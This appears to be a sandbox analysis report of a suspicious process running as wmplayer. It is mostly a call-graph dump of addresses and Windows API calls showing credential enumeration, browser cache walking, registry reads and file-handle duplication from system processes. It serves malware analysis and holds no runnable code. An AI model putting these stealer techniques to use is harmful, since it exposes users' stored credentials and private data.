38247->38248 38249 40b2cc 27 API calls 38248->38249 38250 402c3a 38249->38250 38251 40b2cc 27 API calls 38250->38251 38252 402c51 38251->38252 38253 40b2cc 27 API calls 38252->38253 38254 402c68 38253->38254 38255 40b2cc 27 API calls 38254->38255 38256 402c7f 38255->38256 38257 40b2cc 27 API calls 38256->38257 38258 402c99 38257->38258 38259 40b2cc 27 API calls 38258->38259 38260 402cb3 38259->38260 38261 40b2cc 27 API calls 38260->38261 38262 402cd5 38261->38262 38263 40b2cc 27 API calls 38262->38263 38264 402cf0 38263->38264 38265 40b2cc 27 API calls 38264->38265 38266 402d0b 38265->38266 38267 40b2cc 27 API calls 38266->38267 38268 402d26 38267->38268 38269 40b2cc 27 API calls 38268->38269 38270 402d3e 38269->38270 38271 40b2cc 27 API calls 38270->38271 38272 402d59 38271->38272 38273 40b2cc 27 API calls 38272->38273 38274 402d78 38273->38274 38275 40b2cc 27 API calls 38274->38275 38276 402d93 38275->38276 38277 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38276->38277 38277->38160 38278->38150 38282 40b58d 38279->38282 38281 40b2d1 38281->38224 38283 40b5a4 GetModuleHandleW FindResourceW 38282->38283 38284 40b62e 38282->38284 38285 40b5c2 LoadResource 38283->38285 38287 40b5e7 38283->38287 38284->38281 38286 40b5d0 SizeofResource LockResource 38285->38286 38285->38287 38286->38287 38287->38284 38295 40afcf 38287->38295 38289 40b608 memcpy 38298 40b4d3 memcpy 38289->38298 38291 40b61e 38299 40b3c1 18 API calls 38291->38299 38293 40b626 38300 40b04b 38293->38300 38296 40b04b ??3@YAXPAX 38295->38296 38297 40afd7 ??2@YAPAXI 38296->38297 38297->38289 38298->38291 38299->38293 38301 40b051 ??3@YAXPAX 38300->38301 38302 40b05f 38300->38302 38301->38302 38302->38284 38303->38168 38305 4032c4 38304->38305 38306 40b633 free 38305->38306 38307 403316 38306->38307 38326 44553b 38307->38326 38311 403480 38524 40368c 15 API calls 38311->38524 38313 403489 38314 40b633 free 38313->38314 38315 403495 38314->38315 38315->38170 38316 
4033a9 memset memcpy 38317 4033ec wcscmp 38316->38317 38318 40333c 38316->38318 38317->38318 38318->38311 38318->38316 38318->38317 38522 4028e7 11 API calls 38318->38522 38523 40f508 6 API calls 38318->38523 38320 403421 _wcsicmp 38320->38318 38323 444a64 FreeLibrary 38322->38323 38324 444a83 38322->38324 38323->38324 38324->38170 38325->38171 38327 445548 38326->38327 38328 445599 38327->38328 38525 40c768 38327->38525 38329 4455a8 memset 38328->38329 38336 4457f2 38328->38336 38608 403988 38329->38608 38340 445854 38336->38340 38710 403e2d memset memset memset memset memset 38336->38710 38337 445672 38619 403fbe memset memset memset memset memset 38337->38619 38338 4458bb memset memset 38345 414c2e 16 API calls 38338->38345 38391 4458aa 38340->38391 38733 403c9c memset memset memset memset memset 38340->38733 38341 44557a 38388 44558c 38341->38388 38805 4136c0 CoTaskMemFree 38341->38805 38343 44595e memset memset 38350 414c2e 16 API calls 38343->38350 38344 4455e5 38344->38337 38353 44560f 38344->38353 38346 4458f9 38345->38346 38351 40b2cc 27 API calls 38346->38351 38348 445a00 memset memset 38756 414c2e 38348->38756 38349 445b22 38355 445bca 38349->38355 38356 445b38 memset memset memset 38349->38356 38360 44599c 38350->38360 38361 445909 38351->38361 38365 4087b3 338 API calls 38353->38365 38354 445849 38821 40b1ab free free 38354->38821 38362 445c8b memset memset 38355->38362 38430 445cf0 38355->38430 38366 445bd4 38356->38366 38367 445b98 38356->38367 38370 40b2cc 27 API calls 38360->38370 38371 409d1f 6 API calls 38361->38371 38374 414c2e 16 API calls 38362->38374 38363 445585 38806 41366b FreeLibrary 38363->38806 38364 44589f 38822 40b1ab free free 38364->38822 38372 445621 38365->38372 38380 414c2e 16 API calls 38366->38380 38367->38366 38376 445ba2 38367->38376 38373 4459ac 38370->38373 38384 445919 38371->38384 38807 4454bf 20 API calls 38372->38807 38386 409d1f 6 API calls 38373->38386 38387 445cc9 38374->38387 38894 4099c6 wcslen 38376->38894 38377 
4456b2 38809 40b1ab free free 38377->38809 38379 40b2cc 27 API calls 38392 445a4f 38379->38392 38394 445be2 38380->38394 38381 403335 38521 4452e5 45 API calls 38381->38521 38382 445d3d 38414 40b2cc 27 API calls 38382->38414 38383 445d88 memset memset memset 38397 414c2e 16 API calls 38383->38397 38823 409b98 GetFileAttributesW 38384->38823 38385 445823 38385->38354 38396 4087b3 338 API calls 38385->38396 38398 4459bc 38386->38398 38399 409d1f 6 API calls 38387->38399 38592 444b06 38388->38592 38389 445879 38389->38364 38410 4087b3 338 API calls 38389->38410 38391->38338 38415 44594a 38391->38415 38771 409d1f wcslen wcslen 38392->38771 38403 40b2cc 27 API calls 38394->38403 38396->38385 38407 445dde 38397->38407 38890 409b98 GetFileAttributesW 38398->38890 38409 445ce1 38399->38409 38400 445bb3 38897 445403 memset 38400->38897 38401 445680 38401->38377 38642 4087b3 memset 38401->38642 38404 445bf3 38403->38404 38413 409d1f 6 API calls 38404->38413 38405 445928 38405->38415 38824 40b6ef 38405->38824 38416 40b2cc 27 API calls 38407->38416 38914 409b98 GetFileAttributesW 38409->38914 38410->38389 38424 445c07 38413->38424 38425 445d54 _wcsicmp 38414->38425 38415->38343 38429 4459ed 38415->38429 38428 445def 38416->38428 38417 4459cb 38417->38429 38438 40b6ef 252 API calls 38417->38438 38421 40b2cc 27 API calls 38422 445a94 38421->38422 38776 40ae18 38422->38776 38423 44566d 38423->38336 38693 413d4c 38423->38693 38434 445389 258 API calls 38424->38434 38435 445d71 38425->38435 38500 445d67 38425->38500 38427 445665 38808 40b1ab free free 38427->38808 38436 409d1f 6 API calls 38428->38436 38429->38348 38429->38349 38430->38381 38430->38382 38430->38383 38431 445389 258 API calls 38431->38355 38440 445c17 38434->38440 38915 445093 23 API calls 38435->38915 38443 445e03 38436->38443 38438->38429 38439 4456d8 38445 40b2cc 27 API calls 38439->38445 38446 40b2cc 27 API calls 38440->38446 38442 44563c 38442->38427 38448 4087b3 338 API calls 38442->38448 38916 409b98 
GetFileAttributesW 38443->38916 38444 40b6ef 252 API calls 38444->38381 38450 4456e2 38445->38450 38451 445c23 38446->38451 38447 445d83 38447->38381 38448->38442 38810 413fa6 _wcsicmp _wcsicmp 38450->38810 38455 409d1f 6 API calls 38451->38455 38453 445e12 38460 445e6b 38453->38460 38466 40b2cc 27 API calls 38453->38466 38458 445c37 38455->38458 38456 445aa1 38459 445b17 38456->38459 38474 445ab2 memset 38456->38474 38487 409d1f 6 API calls 38456->38487 38783 40add4 38456->38783 38788 445389 38456->38788 38797 40ae51 38456->38797 38457 4456eb 38462 4456fd memset memset memset memset 38457->38462 38463 4457ea 38457->38463 38464 445389 258 API calls 38458->38464 38891 40aebe 38459->38891 38918 445093 23 API calls 38460->38918 38811 409c70 wcscpy wcsrchr 38462->38811 38814 413d29 38463->38814 38469 445c47 38464->38469 38470 445e33 38466->38470 38476 40b2cc 27 API calls 38469->38476 38477 409d1f 6 API calls 38470->38477 38472 445e7e 38473 445f67 38472->38473 38482 40b2cc 27 API calls 38473->38482 38478 40b2cc 27 API calls 38474->38478 38480 445c53 38476->38480 38481 445e47 38477->38481 38478->38456 38479 409c70 2 API calls 38483 44577e 38479->38483 38484 409d1f 6 API calls 38480->38484 38917 409b98 GetFileAttributesW 38481->38917 38486 445f73 38482->38486 38488 409c70 2 API calls 38483->38488 38489 445c67 38484->38489 38491 409d1f 6 API calls 38486->38491 38487->38456 38492 44578d 38488->38492 38493 445389 258 API calls 38489->38493 38490 445e56 38490->38460 38496 445e83 memset 38490->38496 38494 445f87 38491->38494 38492->38463 38499 40b2cc 27 API calls 38492->38499 38493->38355 38921 409b98 GetFileAttributesW 38494->38921 38498 40b2cc 27 API calls 38496->38498 38501 445eab 38498->38501 38502 4457a8 38499->38502 38500->38381 38500->38444 38503 409d1f 6 API calls 38501->38503 38504 409d1f 6 API calls 38502->38504 38505 445ebf 38503->38505 38506 4457b8 38504->38506 38507 40ae18 9 API calls 38505->38507 38813 409b98 GetFileAttributesW 38506->38813 38517 445ef5 
38507->38517 38509 4457c7 38509->38463 38511 4087b3 338 API calls 38509->38511 38510 40ae51 9 API calls 38510->38517 38511->38463 38512 445f5c 38514 40aebe FindClose 38512->38514 38513 40add4 2 API calls 38513->38517 38514->38473 38515 40b2cc 27 API calls 38515->38517 38516 409d1f 6 API calls 38516->38517 38517->38510 38517->38512 38517->38513 38517->38515 38517->38516 38519 445f3a 38517->38519 38919 409b98 GetFileAttributesW 38517->38919 38920 445093 23 API calls 38519->38920 38521->38318 38522->38320 38523->38318 38524->38313 38526 40c775 38525->38526 38922 40b1ab free free 38526->38922 38528 40c788 38923 40b1ab free free 38528->38923 38530 40c790 38924 40b1ab free free 38530->38924 38532 40c798 38533 40aa04 free 38532->38533 38534 40c7a0 38533->38534 38925 40c274 memset 38534->38925 38539 40a8ab 9 API calls 38540 40c7c3 38539->38540 38541 40a8ab 9 API calls 38540->38541 38542 40c7d0 38541->38542 38954 40c3c3 38542->38954 38546 40c877 38555 40bdb0 38546->38555 38547 40c86c 38996 4053fe 39 API calls 38547->38996 38549 40c7e5 38549->38546 38549->38547 38554 40c634 49 API calls 38549->38554 38979 40a706 38549->38979 38554->38549 39186 404363 38555->39186 38558 40bf5d 39206 40440c 38558->39206 38560 40bdee 38560->38558 38563 40b2cc 27 API calls 38560->38563 38561 40bddf CredEnumerateW 38561->38560 38564 40be02 wcslen 38563->38564 38564->38558 38567 40be1e 38564->38567 38565 40be26 wcsncmp 38565->38567 38567->38558 38567->38565 38569 40be7d memset 38567->38569 38570 40bea7 memcpy 38567->38570 38571 40bf11 wcschr 38567->38571 38572 40b2cc 27 API calls 38567->38572 38574 40bf43 LocalFree 38567->38574 39209 40bd5d 28 API calls 38567->39209 39210 404423 38567->39210 38569->38567 38569->38570 38570->38567 38570->38571 38571->38567 38573 40bef6 _wcsnicmp 38572->38573 38573->38567 38573->38571 38574->38567 38575 4135f7 39223 4135e0 38575->39223 38578 40b2cc 27 API calls 38579 41360d 38578->38579 38580 40a804 8 API calls 38579->38580 38581 413613 38580->38581 38582 41361b 
38581->38582 38583 41363e 38581->38583 38584 40b273 27 API calls 38582->38584 38585 4135e0 FreeLibrary 38583->38585 38586 413625 GetProcAddress 38584->38586 38587 413643 38585->38587 38586->38583 38588 413648 38586->38588 38587->38341 38589 413658 38588->38589 38590 4135e0 FreeLibrary 38588->38590 38589->38341 38591 413666 38590->38591 38591->38341 39226 4449b9 38592->39226 38595 444c1f 38595->38328 38596 4449b9 42 API calls 38598 444b4b 38596->38598 38597 444c15 38599 4449b9 42 API calls 38597->38599 38598->38597 39247 444972 GetVersionExW 38598->39247 38599->38595 38601 444b99 memcmp 38606 444b8c 38601->38606 38602 444c0b 39251 444a85 42 API calls 38602->39251 38606->38601 38606->38602 39248 444aa5 42 API calls 38606->39248 39249 40a7a0 GetVersionExW 38606->39249 39250 444a85 42 API calls 38606->39250 38609 40399d 38608->38609 39252 403a16 38609->39252 38611 403a09 39266 40b1ab free free 38611->39266 38613 4039a3 38613->38611 38617 4039f4 38613->38617 39263 40a02c CreateFileW 38613->39263 38614 403a12 wcsrchr 38614->38344 38617->38611 38618 4099c6 2 API calls 38617->38618 38618->38611 38620 414c2e 16 API calls 38619->38620 38621 404048 38620->38621 38622 414c2e 16 API calls 38621->38622 38623 404056 38622->38623 38624 409d1f 6 API calls 38623->38624 38625 404073 38624->38625 38626 409d1f 6 API calls 38625->38626 38627 40408e 38626->38627 38628 409d1f 6 API calls 38627->38628 38629 4040a6 38628->38629 38630 403af5 20 API calls 38629->38630 38631 4040ba 38630->38631 38632 403af5 20 API calls 38631->38632 38633 4040cb 38632->38633 39293 40414f memset 38633->39293 38635 404140 39307 40b1ab free free 38635->39307 38637 4040ec memset 38640 4040e0 38637->38640 38638 404148 38638->38401 38639 4099c6 2 API calls 38639->38640 38640->38635 38640->38637 38640->38639 38641 40a8ab 9 API calls 38640->38641 38641->38640 39320 40a6e6 WideCharToMultiByte 38642->39320 38644 4087ed 39321 4095d9 memset 38644->39321 38647 408953 38647->38401 38648 408809 memset memset memset memset 
memset 38649 40b2cc 27 API calls 38648->38649 38650 4088a1 38649->38650 38651 409d1f 6 API calls 38650->38651 38652 4088b1 38651->38652 38653 40b2cc 27 API calls 38652->38653 38654 4088c0 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 4088d0 38655->38656 38657 40b2cc 27 API calls 38656->38657 38658 4088df 38657->38658 38659 409d1f 6 API calls 38658->38659 38660 4088ef 38659->38660 38661 40b2cc 27 API calls 38660->38661 38662 4088fe 38661->38662 38663 409d1f 6 API calls 38662->38663 38664 40890e 38663->38664 38665 40b2cc 27 API calls 38664->38665 38666 40891d 38665->38666 38667 409d1f 6 API calls 38666->38667 38668 40892d 38667->38668 39340 409b98 GetFileAttributesW 38668->39340 38670 40893e 38671 408943 38670->38671 38672 408958 38670->38672 39341 407fdf 75 API calls 38671->39341 39342 409b98 GetFileAttributesW 38672->39342 38694 40b633 free 38693->38694 38695 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38694->38695 38696 413f00 Process32NextW 38695->38696 38697 413da5 OpenProcess 38696->38697 38698 413f17 CloseHandle 38696->38698 38699 413df3 memset 38697->38699 38702 413eb0 38697->38702 38698->38439 39632 413f27 38699->39632 38701 413ebf free 38701->38702 38702->38696 38702->38701 38703 4099f4 3 API calls 38702->38703 38703->38702 38705 413e37 GetModuleHandleW 38706 413e1f 38705->38706 38707 413e46 GetProcAddress 38705->38707 38706->38705 39637 413959 38706->39637 39653 413ca4 38706->39653 38707->38706 38709 413ea2 CloseHandle 38709->38702 38711 414c2e 16 API calls 38710->38711 38712 403eb7 38711->38712 38713 414c2e 16 API calls 38712->38713 38714 403ec5 38713->38714 38715 409d1f 6 API calls 38714->38715 38716 403ee2 38715->38716 38717 409d1f 6 API calls 38716->38717 38718 403efd 38717->38718 38719 409d1f 6 API calls 38718->38719 38720 403f15 38719->38720 38721 403af5 20 API calls 38720->38721 38722 403f29 38721->38722 38723 403af5 20 API calls 38722->38723 38724 403f3a 38723->38724 38725 40414f 33 API calls 38724->38725 38726 403f4f 
38725->38726 38727 403faf 38726->38727 38729 403f5b memset 38726->38729 38731 4099c6 2 API calls 38726->38731 38732 40a8ab 9 API calls 38726->38732 39667 40b1ab free free 38727->39667 38729->38726 38730 403fb7 38730->38385 38731->38726 38732->38726 38734 414c2e 16 API calls 38733->38734 38735 403d26 38734->38735 38736 414c2e 16 API calls 38735->38736 38737 403d34 38736->38737 38738 409d1f 6 API calls 38737->38738 38739 403d51 38738->38739 38740 409d1f 6 API calls 38739->38740 38741 403d6c 38740->38741 38742 409d1f 6 API calls 38741->38742 38743 403d84 38742->38743 38744 403af5 20 API calls 38743->38744 38745 403d98 38744->38745 38746 403af5 20 API calls 38745->38746 38747 403da9 38746->38747 38748 40414f 33 API calls 38747->38748 38749 403dbe 38748->38749 38750 403e1e 38749->38750 38751 403dca memset 38749->38751 38754 4099c6 2 API calls 38749->38754 38755 40a8ab 9 API calls 38749->38755 39668 40b1ab free free 38750->39668 38751->38749 38753 403e26 38753->38389 38754->38749 38755->38749 38757 414b81 9 API calls 38756->38757 38758 414c40 38757->38758 38759 414c73 memset 38758->38759 39669 409cea 38758->39669 38760 414c94 38759->38760 39672 414592 RegOpenKeyExW 38760->39672 38764 414c64 38764->38379 38765 414cc1 38766 414cf4 wcscpy 38765->38766 39673 414bb0 wcscpy 38765->39673 38766->38764 38768 414cd2 39674 4145ac RegQueryValueExW 38768->39674 38770 414ce9 RegCloseKey 38770->38766 38772 409d62 38771->38772 38773 409d43 wcscpy 38771->38773 38772->38421 38774 409719 2 API calls 38773->38774 38775 409d51 wcscat 38774->38775 38775->38772 38777 40aebe FindClose 38776->38777 38778 40ae21 38777->38778 38779 4099c6 2 API calls 38778->38779 38780 40ae35 38779->38780 38781 409d1f 6 API calls 38780->38781 38782 40ae49 38781->38782 38782->38456 38784 40ade0 38783->38784 38785 40ae0f 38783->38785 38784->38785 38786 40ade7 wcscmp 38784->38786 38785->38456 38786->38785 38787 40adfe wcscmp 38786->38787 38787->38785 38789 40ae18 9 API calls 38788->38789 38795 4453c4 38789->38795 
38790 40ae51 9 API calls 38790->38795 38791 4453f3 38793 40aebe FindClose 38791->38793 38792 40add4 2 API calls 38792->38795 38794 4453fe 38793->38794 38794->38456 38795->38790 38795->38791 38795->38792 38796 445403 253 API calls 38795->38796 38796->38795 38798 40ae7b FindNextFileW 38797->38798 38799 40ae5c FindFirstFileW 38797->38799 38800 40ae94 38798->38800 38801 40ae8f 38798->38801 38799->38800 38803 40aeb6 38800->38803 38804 409d1f 6 API calls 38800->38804 38802 40aebe FindClose 38801->38802 38802->38800 38803->38456 38804->38803 38805->38363 38806->38388 38807->38442 38808->38423 38809->38423 38810->38457 38812 409c89 38811->38812 38812->38479 38813->38509 38815 413d39 38814->38815 38816 413d2f FreeLibrary 38814->38816 38817 40b633 free 38815->38817 38816->38815 38818 413d42 38817->38818 38819 40b633 free 38818->38819 38820 413d4a 38819->38820 38820->38336 38821->38340 38822->38391 38823->38405 38825 44db70 38824->38825 38826 40b6fc memset 38825->38826 38827 409c70 2 API calls 38826->38827 38828 40b732 wcsrchr 38827->38828 38829 40b743 38828->38829 38830 40b746 memset 38828->38830 38829->38830 38831 40b2cc 27 API calls 38830->38831 38832 40b76f 38831->38832 38833 409d1f 6 API calls 38832->38833 38834 40b783 38833->38834 39675 409b98 GetFileAttributesW 38834->39675 38836 40b792 38837 40b7c2 38836->38837 38838 409c70 2 API calls 38836->38838 39676 40bb98 38837->39676 38840 40b7a5 38838->38840 38842 40b2cc 27 API calls 38840->38842 38845 40b7b2 38842->38845 38843 40b837 CloseHandle 38847 40b83e memset 38843->38847 38844 40b817 39710 409a45 GetTempPathW 38844->39710 38849 409d1f 6 API calls 38845->38849 39709 40a6e6 WideCharToMultiByte 38847->39709 38849->38837 38850 40b827 CopyFileW 38850->38847 38851 40b866 38852 444432 121 API calls 38851->38852 38853 40b879 38852->38853 38854 40bad5 38853->38854 38855 40b273 27 API calls 38853->38855 38856 40baeb 38854->38856 38857 40bade DeleteFileW 38854->38857 38858 40b89a 38855->38858 38859 40b04b ??3@YAXPAX 38856->38859 
38857->38856 38860 438552 134 API calls 38858->38860 38861 40baf3 38859->38861 38862 40b8a4 38860->38862 38861->38415 38863 40bacd 38862->38863 38865 4251c4 137 API calls 38862->38865 38864 443d90 111 API calls 38863->38864 38864->38854 38888 40b8b8 38865->38888 38866 40bac6 39722 424f26 123 API calls 38866->39722 38867 40b8bd memset 39713 425413 17 API calls 38867->39713 38870 425413 17 API calls 38870->38888 38873 40a71b MultiByteToWideChar 38873->38888 38874 40a734 MultiByteToWideChar 38874->38888 38877 40b9b5 memcmp 38877->38888 38878 4099c6 2 API calls 38878->38888 38879 404423 37 API calls 38879->38888 38881 40bb3e memset memcpy 39723 40a734 MultiByteToWideChar 38881->39723 38882 4251c4 137 API calls 38882->38888 38885 40bb88 LocalFree 38885->38888 38888->38866 38888->38867 38888->38870 38888->38873 38888->38874 38888->38877 38888->38878 38888->38879 38888->38881 38888->38882 38889 40ba5f memcmp 38888->38889 39714 4253ef 16 API calls 38888->39714 39715 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38888->39715 39716 4253af 17 API calls 38888->39716 39717 4253cf 17 API calls 38888->39717 39718 447280 memset 38888->39718 39719 447960 memset memcpy memcpy memcpy 38888->39719 39720 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38888->39720 39721 447920 memcpy memcpy memcpy 38888->39721 38889->38888 38890->38417 38892 40aed1 38891->38892 38893 40aec7 FindClose 38891->38893 38892->38349 38893->38892 38895 4099d7 38894->38895 38896 4099da memcpy 38894->38896 38895->38896 38896->38400 38898 40b2cc 27 API calls 38897->38898 38899 44543f 38898->38899 38900 409d1f 6 API calls 38899->38900 38901 44544f 38900->38901 39819 409b98 GetFileAttributesW 38901->39819 38903 44545e 38904 445476 38903->38904 38905 40b6ef 252 API calls 38903->38905 38906 40b2cc 27 API calls 38904->38906 38905->38904 38907 445482 38906->38907 38908 409d1f 6 API calls 38907->38908 38909 445492 38908->38909 39820 409b98 GetFileAttributesW 38909->39820 38911 4454a1 38912 4454b9 38911->38912 38913 40b6ef 252 
[Execution graph: the report's call-graph drawing survives here only as its text export (five-digit node ids, "src->dst" flow arrows and a per-node label with the block address and the imports resolved there). The arrows carry no information without the drawing and are dropped below; the address-to-import labels, which are the usable part, are kept and grouped by what the imports do.]

Resolved imports per block address (from the execution-graph export):
- WinINet URL cache enumeration: 40c2fd FindFirstUrlCacheEntryW; 40c35e and 40c391 FindNextUrlCacheEntryW; 40c373 GetLastError; 40c3ad FindCloseUrlCache; 40c31e and 40c33e wcschr on each entry
- Registry value enumeration: 414592 RegOpenKeyExW; 40c4e4 and 40aa23 RegEnumValueW; 40c505 RegCloseKey; 40c47a _wcsupr; 40a714 _wcslwr
- Run-time import resolution: 405248 _mbscpy _mbscat GetProcAddress, then 405211 GetProcAddress from nine further call sites in the same function (405279, 40528f, 4052a5, 4052bb, 4052d1, 4052e7, 4052fd, 405313, 405329); 40438d, 4043a7, 4043ba, 4043ce, 4043e2 GetProcAddress with 40440c FreeLibrary; 40444f GetProcAddress with 404413 and 404475 FreeLibrary; 4449dc, 4449f3, 444a04, 444a15, 444a26, 444a37, 444a48 GetProcAddress; 413cb0 GetModuleHandleW, 413cbf GetProcAddress; 413f5f GetProcAddress (five times); 4135eb and 44deb5 FreeLibrary
- Handle duplication and file mapping (40e01e path): 40e08d OpenProcess; 40e0a4 GetCurrentProcess DuplicateHandle; 40e0d0 GetFileSize; 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW; 4096dc CreateFileW; 40e0f1 CreateFileMappingW; 40e10b MapViewOfFile; 40e11f WriteFile UnmapViewOfFile; 40e13b, 40e140 and 40e14a CloseHandle; 40e59c DeleteFileW on the cleanup path
- Other file handling: 409b98 GetFileAttributesW; 40e5c4 and 40e57c CloseHandle; 406b53 SetFilePointerEx ReadFile; 40a051 GetFileTime CloseHandle; 4039ca CompareFileTime; 40aebe FindClose; 40b7d4 memset CreateFileW; 4096c3 CreateFileW; 40cc3d GetFileSize; 40a2ef ReadFile; 40cc95 CloseHandle; 417570 SetFilePointer; 41760a ReadFile; 417627, 41759c and 4175a8 GetLastError; 417bf6 UnmapViewOfFile CloseHandle; 4175d6 CloseHandle; 4175ce Sleep
- INI-file settings: 4144a3 GetPrivateProfileStringW; 414495 WritePrivateProfileStringW; 41457f GetPrivateProfileIntW; 4143f1 memset _itow WritePrivateProfileStringW; 414455 wcschr; 414463 _snwprintf
- Embedded resources: 4148b6 FindResourceW; 4148cf SizeofResource; 4148e0 LoadResource; 4148ee LockResource; 41493c EnumResourceNamesW
- Process and system information: 413f37 K32GetModuleFileNameExW; 413ce3 GetProcessTimes; 409cf9 GetVersionExW; 409dd5 GetWindowsDirectoryW wcscpy; 409a66 GetWindowsDirectoryW; 409a74 GetTempFileNameW
- String conversion and memory: 40a6e6 WideCharToMultiByte; 40bc61 memset memset WideCharToMultiByte; 40ab4a and 40ab7c MultiByteToWideChar; 40bd3a LocalFree; 40bcd0 memcmp; 40103c strlen; 40d00b and 40a9ce malloc memcpy free free; 415304 free; 415320 realloc; 415d23 __aullrem __aulldvrm; plus CRT string and memory helpers (memset, memcpy, memmove, wcscpy, wcscat, wcschr, wcslen, wcscmp, _wcsicmp, _memicmp, _snwprintf, strlen, operator new ??2@YAPAXI and operator delete ??3@YAXPAX) at many block addresses

Helpers the export labels only by call count (no import names recoverable): 438552 and 438270 (134 API calls); 443d90 (111); 4251c4 (137); 424f26 (123); 42569b (125); 42f50e (138); 42e1c0, 42e199, 4312d0, 42b13b, 42a0a8 (147); 439811, 44081d, 438c4e, 43a87a, 42db80, 42d836, 42d71d (163); 41f638 (104); 41bc3b (101); 420244, 41e466 (97); 424251 (120); 41f3b1, 42413a (90); 41f398, 41c295, 41edad, 41ee6b, 41a453, 41bf99, 41fd5e (86); 40dd85 (74); 409529 (72); 41c8df (56); 40c589 (43); 4053b6, 4053df, 40538b (39); 404423 (37); 40c1d3 (35); 40b2cc, 40b273, 40b58d (27)

Control-flow Graph (rendered graph omitted): function 0040DD85, basic blocks 0040DD85-0040E01B. APIs on the graph: memset, CreateFileW, NtQuerySystemInformation, CloseHandle, GetCurrentProcessId, _wcsicmp, OpenProcess, GetCurrentProcess, DuplicateHandle. Subcalls: 00409BCA, 0040AFCF, 0041352F, 00413CFA, 00413D4C, 0040E6AD, 00409C52, 00413D29.
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040DDAD
                                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                              • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                            • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                            • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                            • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                            • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                            • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                            • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                            • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                            • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                            • memset.MSVCRT ref: 0040DF5F
                                                                                            • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                            • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                            • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                            • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                            • API String ID: 708747863-3398334509
                                                                                            • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                            • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                            • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                            • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                            APIs
                                                                                              • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                              • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                              • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                            • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                            • free.MSVCRT ref: 00418803
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                            • String ID:
                                                                                            • API String ID: 1355100292-0
